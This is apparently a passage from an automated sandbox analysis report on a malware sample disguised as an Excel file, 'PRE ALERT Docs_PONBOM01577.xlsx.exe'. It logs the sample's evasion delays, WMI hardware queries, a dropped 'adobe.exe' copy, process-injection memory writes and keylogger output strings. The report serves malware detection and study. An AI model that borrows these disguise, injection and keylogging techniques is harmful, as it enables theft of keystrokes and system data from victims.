                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594954s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594829s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594704s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594579s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594454s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594329s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594204s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7940Thread sleep time: -594079s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599124Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598468Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598357Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597906Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597482Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597369Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597242Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597122Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596796Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596577Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596468Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596249Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596139Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 596022Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595700Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595374Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595264Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 595046Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594934Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594823Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeThread delayed: delay time: 594390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599120Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598796Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598463Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598356Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598029Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597918Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597812Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597703Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597593Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597484Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597374Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597265Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597156Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597044Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596937Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596828Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596718Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596609Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596500Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596390Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596281Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595952Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595731Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595624Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595395Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595280Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599532Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599407Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599297Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599171Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 599063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598719Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598610Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598485Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598369Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598141Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 598016Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597907Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597782Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597657Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 596079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 595079Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594954Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594829Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594704Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594579Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594454Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594329Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594204Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeThread delayed: delay time: 594079Jump to behavior
                    Source: adobe.exe, 00000008.00000002.4096542891.0000000000F30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll;
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4095816736.0000000001179000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.1873688267.000000000120D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeMemory written: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeMemory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeProcess created: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe "C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exeProcess created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"Jump to behavior
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q><b>[ Program Manager]</b> (04/07/2024 03:18:53)<br>{Win}r{Win}THcq
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR^q
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q9<b>[ Program Manager]</b> (04/07/2024 03:18:53)<br>{Win}rTHcq
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <html>Time: 07/20/2024 03:22:47<br>User Name: user<br>Computer Name: 066656<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 8.46.123.33<br><hr><b>[ Program Manager]</b> (04/07/2024 03:18:53)<br>{Win}r{Win}r</html>
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q3<b>[ Program Manager]</b> (04/07/2024 03:18:53)<br>
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q8<b>[ Program Manager]</b> (04/07/2024 03:18:53)<br>{Win}THcq
                    Source: PRE ALERT Docs_PONBOM01577.xlsx.exe, 00000002.00000002.4099468817.0000000002E32000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q?<b>[ Program Manager]</b> (04/07/2024 03:18:53)<br>{Win}r{Win}rTHcq
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PRE ALERT Docs_PONBOM01577.xlsx.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
